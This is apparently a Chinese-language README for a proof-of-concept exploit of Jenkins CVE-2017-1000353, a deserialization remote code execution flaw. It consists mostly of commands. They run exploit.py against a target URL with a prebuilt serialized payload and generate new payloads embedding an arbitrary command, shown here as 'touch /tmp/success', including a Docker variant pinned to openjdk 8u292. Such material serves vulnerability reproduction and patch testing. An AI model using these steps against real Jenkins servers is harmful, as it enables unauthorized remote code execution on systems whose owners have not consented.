
jenkins CVE-2017-1000353 POC
如何复现 Jenkins CVE-2017-1000353?
克隆此仓库,使用预先构建的 payload jenkins_poc.ser 运行以下命令:
python exploit.py http://your-ip:8080 jenkins_poc.ser
然后会执行 touch /tmp/success。
重要:payload 的生成依赖于 Java 版本。已在 openjdk:8u292 上成功测试。其他 Java 版本可能无法正常生成 payload 并进行利用。
jenkins_poc.ser?下载 CVE-2017-1000353-SNAPSHOT-all.jar。
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
如果你正在使用 Docker,可以使用以下命令以确保兼容性:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"